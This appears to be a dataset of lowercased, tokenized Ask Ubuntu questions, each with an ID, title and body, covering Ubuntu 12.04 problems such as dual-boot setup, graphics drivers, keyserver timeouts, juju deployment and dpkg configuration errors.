134883	installation problem	i recently installed ubuntu 12.04 alongside windows 7 in my laptop , i have experienced a few problems after my installation however . firstly when i restart my computer i am not presented with the option to run ubuntu , it just goes straight into running windows . secondly my hard-drive is partitioned into two , c and d , windows is installed on c and ubuntu got installed on d. lastly whenever i want to run ubuntu i have to insert the usb i used to install ubuntu with , restart the laptop , press f12 for boot options and select the usb for me to be able to run ubuntu , after this i can remove the usb and ubuntu will run fine until i restart which will require me to use the usb again . i should mention that i do n't know much about computers . how do i solve this problem i want to be presented with the option to run ubuntu when i reboot and also want to install ubuntu in c .
134886	how to disable changing desktop background ( wallpapers ) automatically in ubuntu 12.04 ?	after i upgraded to the ubuntu 12.04 , it seems if i want a wallpaper , the only option is the default one , and the desktop background ( wallpapers ) would be changed throughout the day ( once per hour ) . the problem is that it seems to be not very stable , especially in the case of using two monitors , it crashes during changing the wallpaper from time to time , quite annoying . is there a way to disable changing desktop background ( wallpapers ) throughout the day in ubuntu 12.04 ?
134888	how can i use sso to login to my ubuntu machine instead of local user management	instead of maintaining local user accounts , i would like to be able to use ubuntu sso ( ubuntu one ) accounts to authenticate the logins to my ubuntu machine . any chance ?
134893	light version of wine	are there light version of wine ? i use it only for installing an executable file of windows under linux , donot use it for installing game . why i want a light version of it is because i am not confortable with intalling 208.2 mb wine to my poor computer . note : i am using ubuntu 10.04
134897	how to handle out of space errors	i 'm using ubuntu installed inside windows with wubi . during upgrade to 12.04 i came across a rather devious trap . about 25 % through the installation of packages , i get the message that packages ca n't be installed due to lack of disk space on /usr . and of course , its down to 140m when i check . so what to do ? ca n't interrupt , ca n't continue . since i have a huge disk that seems accessible , which is /host , namely the usb hdd i have ubuntu installed on , i figure what the heck , perhaps i can copy over some files there and then make links to them in /usr . so i tried sudo mv /usr/lib /host/usr , but all this did was cause error messages and leave the files in place , while creating copies in /host/usr , a behaviour i found oddly disconcerting : what happened ? did some files get moved and some not ? so i figured , perhaps i can check and see if i can remove some stuff with apt-get , but that gave the error that there was a lock on the dpkg something or other , `` perhaps it is used by another process ? '' . what 's left to do ? i clicked through the warnings of packages not being installed and rebooted , and now startup is aborted and i end up at the text-only login prompt . so , my installation is screwed , i 'll probably just reinstall and do it without wubi this time . my question is two-fold : why would n't an installation process check disk space required before i click ok ? especially when it can not be interrupted . is there a way to get around these kind of traps , where you need space now . what tricks are there ?
134898	record tv programm from vlc	i am using vlc 2.0.1 to watch tv ( dvb-t ) through my pci tv tuner is it possible to record a tv programm as .avi or .mp4 file ? can i record it with vlc or another app ? i am ubuntu 12.04 user thanks in advance !
134899	watchdog/0 process using all my cpu suddenly	i have a fresh installation of ubuntu 12.04 , i have been running it for about a week . suddenly today i noticed my computer freezes every 5 seconds . i restarted the computer and i still get this . i believe it is a process called watchdog/0 that is using all the resources . see the attached pictures . how can i stop this ? i can barely use my computer like this . update well i just did a cold reboot , ( shutdown , unplug , and plug back in , and turn on ) and it seems to have fixed it . after looking at the man page for watchdog , it seems that this process may stay on during a restart ? so it is more like a soft restart ? why that happens i do n't know .
134905	i cant install ubuntu 12.04	first , sorry for my bad english . i ca n't install ubuntu . when i boot cd , and select language , and press install ubuntu , than everything sto responding , and after 5 minutes i get some green letters and some error , but i ca n't understand it , you cant see it good ... i have preinstaled windows 8 consumer preview , but free ( not formated ) drive for ubuntu . please help .
134907	ubuntu 12.04 and bluetooth mouse	i have just installed the `` windows '' version ( to try out ) of ubuntu 12.04 and everything went fine with the install , only problem is i can not find a way of using my bluetooth mouse as ubuntu keeps asking for the `` key '' on the device ... what key ? there is no key or number on the device , anyone know what this is all about . when i 'm using ubuntu i have to resort to a standard usb wired mouse.. i normally use the bluetooth mouse on both windows 7 and mac osx lion without any problems what so ever ...
134913	ca n't add repo keys	i 'm tring to add a keys ( on kubuntu 12.04 ) sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys somekey and i constantly get gpg : requesting key 8ac93f7a from hkp server keyserver.ubuntu.com gpg : keyserver timed out gpg : keyserver receive failed : keyserver error i thought my ports are closed . but the following should have made ports 80 and 11371 open : iptables -a input -p tcp -d 0/0 -s 0/0 -- dport 80 -j accept iptables -a input -p tcp -d 0/0 -s 0/0 -- dport 11371 -j accept but i still get timed out . edit : the following solves it : sudo gpg -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv-keys somekey
134914	samsung np305u1a laptop wo n't resume from suspension	i just bought a samsung np305u1a laptop and installed ubuntu desktop 12.04 lts on it . whenever i suspend the computer and try to wake it back up , the monitor only shows a black screen and the only thing i can do is a hard reset . kernel : 3.2.0-24-generic graphic : radeon hd 6320 anybody know what to do ? update i did some some research and remebered that i installed the `` ati/amd proprietary fglrx graphics driver '' from the `` additional drivers '' software bundled in ubuntu . i also tried to install the `` ati/amd proprietary fglrx graphics driver ( post-release updates ) '' but whenever i do , it gives me an error and i ca n't continue so i decided to make a clean install of ubuntu 12.04 again and when i tried the suspension out-of-the-box , it did work . but since i ca n't install the drivers i need , hd video is choppy like hell . so perhaps the suspension bug was fixed in the post-release updates of the driver , but sadly i can not install them , and i do n't know why .
134918	setting vpn client	i need to access vpn from my ubuntu 12.04 . i see that there is vpn connections > configure vpn in network manager , but it asks for username and password . all i have is some .crt , .csr , .key , .ovpn files , which are suited for some windows client . i 'm really newbie with vpn . i also found this blog post . is that a way to go ?
134926	after upgrading to ubuntu 12.04 , my broadcom sta wireless driver is not working	i upgraded my hp dv5-1000us laptop to ubuntu 12.04 . but i can not get it connected to the wireless . i went through the settings , hardware , additional drivers and it says that `` no proprietary drivers are in use on this system '' . also it says `` broadcom sta wireless driver '' is not activated . i tried to activate it after got my laptop connected to the net through a wired connection , but it says sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log
134928	when i switch workspace all workspaces are merged	when i switch workspaces it looks like all workspaces are `` merged '' into one workspace and then they re split again . this would be no problem if it were n't for the fact that all my browser windows get stuck on workspace 1 after the `` merge '' . is there any way to stop this behavior ? the workspace switching is also significantly slower in 12.04 than 11.10 . i 'm running ubuntu 12.04
134931	can i print from ubuntu using a printer installed in guest os ( windows xp ) ?	i could not make my canon lbp6000 printer work in ubuntu . i have installed it in my guest os ( windows xp ) in virtual box . now i want to use that printer in the guest os from ubuntu . is it possible at all ? and if yes how ? thanks
134933	why some applications updated and others are not ?	pues eso , me gustaría conocer el motivo por el que hay aplicaciones que se actualizan ( por ejemplo firefox , thunderbird , chromium , etc . ) y hay otras aplicaciones que no reciben la última actualización de los mismos ( como transmission , libreoffice , gimp , xfce 4.10 etc . ) actualmente uso xubuntu 11.10 y xubuntu 12.04 , pero creo que esto sucede en todas las versiones . translation via spanishdict i would like to know the reason why there are applications that are updated ( e.g . firefox , thunderbird , chromium , etc . ) and there are other applications that do not receive the latest update of the same ( such as transmission , pri , gimp , xfce 4.10 etc . ) currently i 'm using xubuntu 11.10 and xubuntu 12.04 , but i think this happens in all versions .
134941	can not install with wubi	apologies if this has been posted before , but i need some help installing 12.04 alongside windows . i downloaded the iso ( 64 bit ) then created a bootable cd with it . then i downloaded wubi . i proceeded to select the size of the partition ( 20gb ) and set my username and password . the installation begins , and asks me to reboot after a while . upon reboot , the splash page comes up and the installation continues , completes and reboots . i then get the following error : no wubildr ; prefix not found at that point i 'm left in what looks like a terminal or command prompt . how can i make the install work ?
134946	installing packages from an .iso file	i have installed ubuntu 12.04 on a desktop system and i have an .iso file of edubuntu 12.04 , can i install edubuntu packages in ubuntu 12.04 from edubuntu 's iso file ? that desktop system has no internet connection .
134948	xorg starts in failsafe mode when nvidia-current is active	i have nvidia-current installed ( version 295.40-0ubuntu1 ) and nvidia-current-updates ( version 295.49-0ubuntu0.1 ) running on ubuntu 12.04 . these are the latest version in ubuntu proposed , but the problem was before the update to proposed . the problem is that after running sudo nvidia-xconfig i get a xorg.config generated as shown at the end . when i reboot the xorg starts but in a very low resolution ( failsafe mode ) . this happens with or without my second hdmi screen attached ( which mirrors my latop screen ) . i have a dell xps 14z , with a nvidia geforce gt 520m 1gb graphics with optimus . i do n't not have any issues with the same card on the same computer under windows 7 . my kernel is : 3.2.0-23.36 . any help with this would be great , i really would like my nvidia driver to work . xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.49 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) tue may 1 00:54:24 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection the ( ee ) in /var/log/xorg.0.log is : [ 10.014 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 )
134953	allowing restricted useres wifi access	is there a way to allow restricted users/accounts the ability to add a wifi profile and connect to a wifi network ?
134958	is there any graphical control panel available for apache2 and mysql to start and stop them ?	i dont like command line . is there a graphical control panel to start/stop apache2 ? and mysql ?
134968	how to launch different firefox profiles via the keyboard using unity	i 'm a heavy user of firefox profiles - a general one , work and one just for facebook so facebook does n't know where i 'm browsing . i have customised my firefox launcher icon to give me access to profiles by right click . however what i really want is to hit a key and type `` face '' , hit enter and have the facebook profile launched . before unity i had this by having multiple application launchers and then using gnome do to access them . so how can i set up the same workflow with unity ? is there a keyboard centric way to access the right click menu of launcher icons ? do i have to set up multiple launcher icons ?
134969	ntpd server always in 'init ' mode	i 'm running ntpd server in my ubuntu ( 10.04 ) machine . but it is always stays in the 'init ' state as shown below . lyra @ ws07475 : ~ $ ntpq -p remote refid st t when poll reach delay offset jitter ============================================================================== europium.canoni .init . 16 u - 1024 0 0.000 0.000 0.000 lyra @ ws07475 : ~ $ of course , this means that it is not keeping time . how can i start 'ntpd ' server properly ? please help .
134975	copy ssh private keys to another computer	i need to use another computer to access my ssh server . this is because a recently implemented vpn at my university does n't work on my current computer and i have lost access to the server . i ssh via encrypted ssh keys . can i copy these keys to the new computer ( on which the vpn works ) . i tried copying the id_rsa and id_rsa.pub files in the ~/.ssh folder but it does n't recognize the keys and there is no prompt to input a password to decrypt the keys . edit : i ca n't access the server to generate a new key pair for the new computer and am out of the country so ca n't physically access it . thanks .
134977	juju stuck in `` pending '' state when using lxc	so i 'm trying to get started with juju , and tried to do this locally using lxc . i followed the instructions here : how do i configure juju for local usage ? unfortunately this does n't seem to work for me . status shows the following : $ juju status machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : mysql : charm : cs : precise/mysql-1 relations : db : - wordpress units : mysql/0 : agent-state : pending machine : 0 public-address : null wordpress : charm : cs : precise/wordpress-0 exposed : true relations : db : - mysql units : wordpress/0 : agent-state : pending machine : 0 open-ports : [ ] public-address : null 2012-05-10 14:09:38,155 info 'status ' command finished successfully as you can see the agent-state is 'pending ' and there is no public address where i 'm able to access the newly created site . am i missing something here ? update : tried destroying the environment an doing everything again ( multiple times ) . this is the output for debug-log : ~ $ juju debug-log 2012-05-11 08:50:23,790 info enabling distributed debug log . 2012-05-11 08:50:23,806 info tailing logs - ctrl-c to stop . 2012-05-11 08:50:42,338 machine:0 : juju.agents.machine debug : units changed old : set ( [ ] ) new : set ( [ 'mysql/0 ' ] ) 2012-05-11 08:50:42,339 machine:0 : juju.agents.machine debug : starting service unit : mysql/0 ... 2012-05-11 08:50:42,459 machine:0 : unit.deploy debug : downloading charm cs : precise/mysql-1 to /home/andre/.juju/data/andre-local/charms 2012-05-11 08:50:42,620 machine:0 : unit.deploy debug : using < juju.machine.unit.unitcontainerdeployment object at 0x9c54b6c > for mysql/0 in /home/andre/.juju/data/andre-local 2012-05-11 08:50:42,648 machine:0 : unit.deploy debug : starting service unit mysql/0 ... 2012-05-11 08:50:42,649 machine:0 : unit.deploy debug : creating master container ... 2012-05-11 08:54:33,992 machine:0 : unit.deploy debug : created master container andre-local-0-template 2012-05-11 08:54:33,993 machine:0 : unit.deploy info : creating container mysql-0 ... 2012-05-11 08:56:18,760 machine:0 : unit.deploy info : container created for mysql/0 2012-05-11 08:56:19,466 machine:0 : unit.deploy debug : charm extracted into container 2012-05-11 08:56:19,569 machine:0 : unit.deploy debug : starting container ... 2012-05-11 08:56:22,707 machine:0 : unit.deploy info : started container for mysql/0 2012-05-11 08:56:22,707 machine:0 : unit.deploy info : started service unit mysql/0 2012-05-11 08:56:23,012 machine:0 : juju.agents.machine debug : units changed old : set ( [ 'mysql/0 ' ] ) new : set ( [ 'wordpress/0 ' , 'mysql/0 ' ] ) 2012-05-11 08:56:23,039 machine:0 : juju.agents.machine debug : starting service unit : wordpress/0 ... 2012-05-11 08:56:23,154 machine:0 : unit.deploy debug : downloading charm cs : precise/wordpress-0 to /home/andre/.juju/data/andre-local/charms 2012-05-11 08:56:23,396 machine:0 : unit.deploy debug : using < juju.machine.unit.unitcontainerdeployment object at 0x9c519cc > for wordpress/0 in /home/andre/.juju/data/andre-local 2012-05-11 08:56:23,620 machine:0 : unit.deploy debug : starting service unit wordpress/0 ... 2012-05-11 08:56:23,621 machine:0 : unit.deploy info : creating container wordpress-0 ... 2012-05-11 08:58:24,739 machine:0 : unit.deploy info : container created for wordpress/0 2012-05-11 08:58:25,163 machine:0 : unit.deploy debug : charm extracted into container 2012-05-11 08:58:25,397 machine:0 : unit.deploy debug : starting container ... 2012-05-11 08:58:27,982 machine:0 : unit.deploy info : started container for wordpress/0 2012-05-11 08:58:27,983 machine:0 : unit.deploy info : started service unit wordpress/0 this is the result for the status command ( with verbose flag ) : ~ $ juju -v status 2012-05-11 08:51:53,464 debug initializing juju status runtime 2012-05-11 08:51:53,625:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2012-05-11 08:51:53,625:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 662 : client environment : host.name=andre-ufo 2012-05-11 08:51:53,625:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2012-05-11 08:51:53,625:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.2.0-24-generic-pae 2012-05-11 08:51:53,625:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 37-ubuntu smp wed apr 25 10:47:59 utc 2012 2012-05-11 08:51:53,626:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 679 : client environment : user.name=andre 2012-05-11 08:51:53,626:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/andre 2012-05-11 08:51:53,626:4030 ( 0xb7345b00 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/andre 2012-05-11 08:51:53,626:4030 ( 0xb7345b00 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=192.168.122.1:41779 sessiontimeout=10000 watcher=0xb7780620 sessionid=0 sessionpasswd= < null > context=0x9242ee8 flags=0 2012-05-11 08:51:53,627:4030 ( 0xb6b90b40 ) : zoo_info @ check_events @ 1585 : initiated connection to server [ 192.168.122.1:41779 ] 2012-05-11 08:51:53,649:4030 ( 0xb6b90b40 ) : zoo_info @ check_events @ 1632 : session establishment complete on server [ 192.168.122.1:41779 ] , sessionid=0x1373ae057d90007 , negotiated timeout=10000 2012-05-11 08:51:53,651 debug environment is initialized . machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : mysql : charm : cs : precise/mysql-1 relations : db : - wordpress units : mysql/0 : agent-state : pending machine : 0 public-address : null wordpress : charm : cs : precise/wordpress-0 relations : db : - mysql units : wordpress/0 : agent-state : pending machine : 0 public-address : null
134983	boot problem in ubuntu precise pangolin 12.04	after updating the updates , ubuntu refuse to reboot ? please help ? how i can recover ubuntu 12.04
134984	why there are two brightness control file ( /sys/class/ ) in my system	i own an dell xps 15 . i guess the following is because i have hybrid graphics system ( nvidia optimus ) . when i run command to find out lcd brightness path using following command , ls /sys/class/backlight/*/brightness i receive the following output /sys/class/backlight/acpi_video0/brightness /sys/class/backlight/intel_backlight/brightness now if i echo a value say 5 to either of them , lcd brightness changes . only thing is intel_backlight path brightness is very low compared to acpi_video0 . is it normal ? i want to know what is the difference ( if any ) and whether for this two different paths gnome fails to save my brightness settings on reboot .
134986	contrast getting reset to its maxmum value after restarting system	recently i installed ubuntu 12.04 on my laptop `` dell inspiron-n4010 '' . i am facing problem with my contrast control , after restarting my system contrast is getting reset to its max value . so each time after login have to set the contrast again & again . please advice ... . regards , shiv rajawat
134989	problem with keyboard and trackpad on ubuntu 12.04	have a really strange issue with my keyboard and trackpad after installing ubuntu 12.04 . it picked up both fine with the livecd and in the install , but for quite awhile now , i find when i power my laptop up ( toshiba satellite l775d-s7132 ) , when i hit the login screen much of the time i wo n't have any keyboard or touchpad . i can plug in a usb mouse and then at least restart or shut the laptop down and then keep trying until it picks it up correctly , but it 's really a pain to have to do that all the time . are there quite a few bugs related to keyboard and trackpad issues with the new version ? i really want to get this issue resolved as it 's a major nuisance . otherwise , my hardware gets picked up fine . video , audio , wlan , usb work perfectly and i do n't ever have any issues with them . what 's the best way to figure out the problem ?
134992	weird popup each time ubuntu 12.04 boots up	i recently upgraded from ubuntu 11.10 to 12.04 , there was an interruption in the download , however the s/m seems to be working fine , just that each time i boot up i get the following message `failure to download extra data filesname-ar.utf-8 : فشل تنزيل ملفات البيانات الإضافيةname-ast.utf-8 : fallu al descargar ficheros de datos estraname-bn.utf-8 : অতিরিক্ত ডাটা ফাইল ডাউনলোড করতে ব্যর্থ হয়েছেname-bs.utf-8 : neuspjelo učitavanje dodatnih datoteka s podacimaname-ca.utf-8 : ha fallat la baixada dels fitxers de dades addicionalsname-da.utf-8 : kunne ikke hente ekstra datafilername-de.utf-8 : herunterladen von zusätzlichen datendateien schlug fehlname-el.utf-8 : αποτυχία λήψης επιπλέον αρχείων δεδομένωνname-en_au.utf-8 : failure to download extra data filesname-en_gb.utf-8 : failure to download extra data filesname-eo.utf-8 : fiasko dum elŝutado de pliaj datumdosierojname-es.utf-8 : fallo al descargar archivos de datos extraname-fi.utf-8 : ylimääräisten tiedostojen lataus epäonnistuiname-fr.utf-8 : échec du téléchargement des données supplémentairesname-gd.utf-8 : dh'fhàillig luchdadh a-nuas faidhlichean dàta a bharrachdname-gl.utf-8 : fallo na descarga de ficheiros extra de datosname-he.utf-8 : הורדת קובצי נתוני נוספים נכשלהname-hr.utf-8 : greška pri preuzimanju dodatnih podatkovnih datotekaname-hu.utf-8 : nem sikerült letölteni az extra adatfájlokatname-id.utf-8 : gagal mengunduh berkas data ekstraname-it.utf-8 : scaricamento file dati extra non riuscitoname-ja.utf-8 : 追加データのダウンロードに失敗name-km.utf-8 : បាន​បរាជ័យ​ក្នុង​ការ​ទាញយក​ឯកសារ​ទិន្នន័យ​បន្ថែមname-lt.utf-8 : nepavyko atsiųsti papildomų duomenų failųname-lv.utf-8 : neizdevās lejupielādēt papildus datu failusname-ms.utf-8 : gagal memuat turun fail data tambahanname-nl.utf-8 : downloaden van extra gegevensbestanden is misluktname-oc.utf-8 : fracàs del telecargament de las donadas suplementàriasname-pt_br.utf-8 : falha ao baixar arquivos de dados adicionaisname-ro.utf-8 : eșec la descărcarea fișierelor cu date suplimentarename-ru.utf-8 : ошибка загрузки дополнительных файлов данныхname-sk.utf-8 : zlyhalo stiahnutie ďalších dátových súborovname-sl.utf-8 : napaka med prejemom dodatnih podatkovnih datotekname-sq.utf-8 : dështoi shkarkimi i skedarëve të të dhënave ekstraname-sv.utf-8 : misslyckades med att hämta extra datafilername-tr.utf-8 : fazladan veri dosyalarını indirme başarısızname-ug.utf-8 : قوشۇمچە سانلىق-مەلۇمات ھۆججەتلىرىنى چۈشۈرۈش مەغلۇپ بولدىname-uk.utf-8 : не вдалось завантажити додаткові файли данихname-vi.utf-8 : lỗi khi tải các tập tin dữ liệu bổ sung xuốngname-zh_cn.utf-8 : 下载额外数据文件失败name-zh_tw.utf-8 : 下載額外資料檔案失敗 the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . ttf-mscorefonts-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection.` and asks me to run the installer , and then asks for password . however the popup just disappears only to re-appear when i reboot .any help would be appreciated
134993	changing backgrounds in ubuntu 12.04	i updated ubuntu on my computer and i seen , that there is a daily changing option in background menu , but i ca n't set my own pictures/wallpapers as changing background . i typed `` gsku nautilus '' , copied my wallpapers to the /usr/share/backgrounds , but i have n't seen my wallpapers at the setup menu . can anybody type it , how to set my own wallpapers as changing backgrounds ? ( i 'm a beginner . ) thank you !
134994	suspend , ubuntu 12.04 sony vaio vgn-nw120j	i 've install 12.04 on my vaio as a second os . i created 2 new partitions for swap and / . when the lid is closed , system fails in suspend mode . the indicator blinks like it does in windows ( by powered on it is green , on suspend links orange ) . but when i start the system again by pressing any key , it looks like normal boot . no changes are saved . what can be the problem ? p.s all updates are installed .
134997	how to change folders color ?	how do i change the folders colors ? i am using this icon theme fs icons and there are several folders . like black , gray , purple , orange ( which is the default ) , yellow , green , red , blue , brown and lightblue how can i use any of them ? for example have a blue folder called `` family '' in images and another right beside that have a purple folder called `` others '' . basically why have he created all those folders with different colors ?
135002	black screen after purple page when using integrated graphics	i am fairly new to ubuntu , but love it already . i recently went into grub and switched back forth between integrated and discrete ( nvidia ) graphics and now when i boot using the integrated card i get to ubuntu 's purple page and then after that the screen goes black and nothing . i may have accidentally modified some file while trying to follow some advice online , but not sure what files . maybe `` /etc/x11/xorg.conf '' but i 'm not sure and if so i ca n't remember what i did to it . what can i do to get it working again ? ! ? ! ? update : i wanted to add a little more information about my system computer : lenovo thinkpad w520 system : ubuntu 11.04 processor : intel core i7-2820qm processor ( 2.30ghz , 8mb l3 ) system graphics : nvidia quadro 2000m graphics with 2gb ddr3 memory total memory : 16 gb pc3-10600 ddr3 sdram 1333mhz sodimm memory ( 4 dimm ) thanks !
135003	kde fonts not rendering bold in ubuntu 12.04	i 'm using ubuntu 12.04 with some kde programs : kate and yakuake . neither of these programs will render bold font . instead , the font appears as `` regular '' . how can i fix this ? the image below shows an example of kate rendering python with the stock python highlighting ( the colors are inverted using compizconfig settings manager 's negative option ) . the following words should have appeared bold : class def __init__ lambda + print similarly yakuake ( or perhaps , the underlying konsole ) is not rendering bold . my ls_colors includes : di=01 ; 34 ( bold blue ) below is my gnome-terminal rendering bold fonts just fine .
135009	failing gnome-shell theme : where can i find errors/configuration apart from gnome-tweak-tool ?	i have a gnome-shell desktop that , since the update from ubuntu 11.10 to 12.04 , acts strange . in detail , i have a high cpu activity that seems ( looking from other questions here ) could be triggered by a theme error . now , i have no special theme installed -- - but the gnome-tweak-tool is reporting an error ( look at the screenshot down here ) . given that : the theme list is `` locked '' the warning signal is not clickable running gnome-tweak-tool in a terminal shows no useful errors activating lookingglass shows no error whatsoever .xsession-errors has not errors anyone knows where can i see for the specific error , or how to reset the configuration without deleting all the .dconf directory ?
135013	does anyone use 12.04 with hd 6950 ?	back when i first tried to switch from windows to ubuntu ( 6-7 months ago ) i had several graphics related problems . the vga was overheating , graphic glitches , video playing issues , slow/choppy window movements etc . after 2-3 reinstalls , hours of playing with different drivers/settings i decided to return to windows : \ now i want to give it another shot . but before i start to format , partitioning , backup and other time consuming stuff i wanted to ask if anyone using the 12.04 with hd 6950 . can i utilize the full potential of it , or the drivers are still not good enough ? i know that linux is n't meant to play games in the first place , but the games i playing ( sc2 , blc , hon , dota 2 ) are working with wine as far as i know ( or are n't ? ) and i ca n't find any reason not to switch from windows if i can utilize the full potential of my config in ubuntu . so anyone who got experiences with this vga in ubuntu please reply . thanks in advance : )
135014	how to change the color tone of the ambiance theme ?	i am using 12.04 . i found a video where the primary colour of the unity interface is light blue rather than orange ( the buttons , the icons , and the dash icon ) . how can you change all orange colours ?
135015	how do i install and play the brettspielwelt client ?	brettspielwelt is a board game client available to download to play board games with other players on the internet . ( http : //www.brettspielwelt.de/ ? nation=en ) i am completely new to ubuntu having only just downloaded and installed it on my computer and still do n't understand all the basics . so my problem is that having downloaded the brettspielwelt client , i extracted it to a folder , and set permissions for the start.sh file to open as an executable . now when i click the start.sh to open , it should start the brettspielwelt client but nothing happens ! so can someone help me please ? as i have no idea why it did n't , although i was wondering is it something to do with java ? also if there are any board game fans out there , get brettspielwelt !
135016	how to fix out the error dpkg : error processing colord ( -- configure ) :	i have upgrade my ubuntu from 11.10 to 12.04. at last i can found that when i tries to install some packages it shows a error . after reading some blog i tried to fix that error by `` sudo dpkg -- configure -a '' . but when i run this command it show another error this setting up colord ( 0.1.16-2 ) ... useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /var/lib/colord -g colord -s /bin/false -u 115 colord ' returned error code 1 . exiting . dpkg : error processing colord ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up whoopsie ( 0.1.32 ) ... useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /nonexistent -g whoopsie -s /bin/false -u 115 whoopsie ' returned error code 1 . exiting . dpkg : error processing whoopsie ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up lightdm ( 1.2.1-0ubuntu1 ) ... adding system user `lightdm ' ( uid 115 ) ... adding new user `lightdm ' ( uid 115 ) with group `lightdm ' ... useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /var/lib/lightdm -g lightdm -s /bin/false -u 115 lightdm ' returned error code 1 . exiting . dpkg : error processing lightdm ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of ubuntu-desktop : ubuntu-desktop depends on lightdm ; however : package lightdm is not configured yet . dpkg : error processing ubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : colord whoopsie lightdm ubuntu-desktop what can i do now ?
135018	when should i expect the nvidia 302+ driver to be available ?	nvidia has released a driver with randr support ( version 302 , just this week ) . it looks like this would probably show up first in the x updates ppa . how long does it typically take for a new upstream release to land in the x updates ppa ?
135020	stopping system v runlevel compatibility - stuck on logon screen	my wireless stopped working suddenly and i tried to reinstall the driver . i think that i installed the wrong one and after rebooting i am stuck on ubuntu login screen . when i try to login ubuntu blinks with black screen with the message : stopping system v runlevel compatibility . after that it returns to the login screen . lspci shows me wifi driver rtl8191sevb . **i installed the rtl8187l driver when the problem appeared . i tried to blacklist all kinds of rtl drivers but ubuntu again and again shows me rtl8191sevb . wireless card is working , i try it on win . this is the output i get when i try to login : stopping save kernel messages starting cups printing spooler/servers starting virutalbox kernel modules starting bluetooth ( star is a yellow color ) pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned *checking battery state stopping system v runlevel compatibility . /etc/modules/ lp rtc coretemp lsmod | grep rt parport_pc 36962 0 parport 46562 3 parport_pc , ppdev , lp blacklisted ( as i said i try all kind rtl drivers , but i try with with all commented also , same thing ) blacklist rtl8192se blacklist rtl8192ce blacklist rtl8192de blacklist rtl8187l blacklist rtl8187 blacklist rtlwifi kernel warn : [ 23.198960 ] mei : module is from the staging directory , the quality is unknown , you have been warned kernel error [ 1.077841 ] pci0000:00 : acpi _osc request failed ( ae_error ) , returned control mask : 0x1d [ 23.255556 ] ext4-fs ( sda3 ) : re-mounted . opts : errors=remount-ro
135021	google chrome windows are lost in application switcher	yesterday i just installed 12.04 and installed google-chrome . but something went wrong . i run chrome and the window appears , but when i change to other running app ( alt + tab ) the chrome window disappears . i open chrome again , but ever i change or minimize the window , it disappears , but still is in process list ( ps -a ) . is there a solution for this ?
135022	live usb version works but not installed version	everything in ubuntu 12.4 works when i boot from a persistent live usb stick , but when i install it , the wireless network driver and mouse do n't work . i 'm running it on a eee 1000h netbook .
135024	how to open a mib file in tkmib ?	i 've tried to open several mib files in tkmib without success . for example : $ sudo apt-get install tkmib $ wget http : //www.mibsearch.com/vendors/compaq/download/cpqhlth-mib $ tkmib cpqhlth-mib click `` walk '' , then you should get an error message like this : setting opts getaddrinfo : cpqhlth-mib no address associated with hostname error : snmp_new_session : could n't open snmp session at /usr/lib/perl5/snmp.pm line 475. unable to create session at /usr/lib/perl5/snmp.pm line 547 . tk : :error : ca n't call method `` getnext '' on unblessed reference at /usr/bin/tkmib line 506. main : :snmpwalk at /usr/bin/tkmib line 506 tk callback for .frame5.button2 tk : :__anon__ at /usr/lib/perl5/tk.pm line 250 tk : :button : :butup at /usr/lib/perl5/tk/button.pm line 175 < buttonrelease-1 > ( command bound to event ) as i 'm completely new to snmp and mib files , and man tkmib is sparse to say the least , what do i actually need to do to be able to work with this file ?
